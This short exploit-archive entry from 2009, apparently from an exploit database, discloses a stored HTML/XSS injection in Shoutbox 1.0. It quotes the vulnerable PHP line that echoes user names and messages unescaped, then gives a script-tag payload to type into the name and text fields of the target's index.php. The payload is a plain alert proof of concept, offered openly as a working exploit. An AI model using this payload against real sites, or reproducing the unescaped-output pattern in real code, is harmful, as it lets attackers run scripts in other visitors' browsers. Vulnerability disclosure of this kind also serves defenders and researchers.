[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Shoutbox 1.0 HTML / Xss Injection
# Published : 2009-11-18
# Author : SKuLL-HacKeR
# Previous Title : Joomla 1.5.12 RCE via TinyMCE upload vulnerability
# Next Title : Xerver 4.31, 4.32 HTTP Response Splitting


# Vulnerable Code in index.php :
#
# <p><strong><?php echo $names[$i]; ?>:</strong> <?php echo $shouts[$i]; ?></p>
#
########################################
# Shoutbox 1.0 HTML / Xss inejction exploit
# AuTh0r  : SKuLL-HacKeR                                                
# H0ME     : Sec-Best & SaudiHack & S3curity-Art                        
# Email    : My@Hotmail.iT                                              
########################################
 
Vendor: http://www.plohni.com
exploit: 
site.com/Shoutbox/index.php
in the select your name and your text put this code 
'">><script>alert('XSS skh')</script>